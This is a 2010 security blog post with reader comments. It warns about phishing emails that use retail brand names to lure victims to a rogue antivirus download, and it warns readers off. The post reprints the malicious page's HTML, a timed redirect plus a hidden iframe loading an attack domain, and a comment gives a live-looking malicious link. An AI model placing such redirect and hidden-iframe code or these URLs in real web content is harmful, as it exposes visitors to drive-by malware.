Malicious emails lead to rogue AV software antivirus_24.exe
August 7, 2010 2 Comments
MX Lab intercepted emails that leads to the rogue anti virus software with the executable antivurs_24.exe. The senders make use of well known brand names like Macy’s, Costco Photo Center and perhaps also other brands as well.
The URLs inside the message lead to a web site that hosts a malicious script and will offer you the option to download antivirus_24.exe later on.
When following this URL on our Mac we got the message “PLEASE WAITING 4 SECOND…”.
The web site has the following HTML code:
PLEASE WAITING 4 SECOND... <meta http-equiv="refresh" content="4; url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24"></head><body> <iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10" style="visibility: hidden;" height="1" width="1"></iframe> </body></html>
We got the following screen below but I’m sure that on Windows it will be slightly different. Some Windows icons will be included of your hard drives and so on.
You will get to see some errors, your system is infected and the instructions lead you to download the malware. This part is obviously fake so please do not continue the process.
Virus Total permlink and MD5: 5be4b708a68687cb5490fe2caea49c82
Just received a similar one purpotedly from myspace showing the address:
http://profileedit.myspace.com/index.cfm?fuseaction=accountSettings.cancelAccount
the link actually being to:
http://kidstylesource.com/x.html
I have not followed it though.
Thanks for the URL. We did managed to get a working malicious scripting that allowed us to make some screenshots and download the malware. Details can be found in our new article “Analysis of rogue anti virus software” http://blog.mxlab.eu/2010/08/20/analysis-of-rogue-anti-virus-software/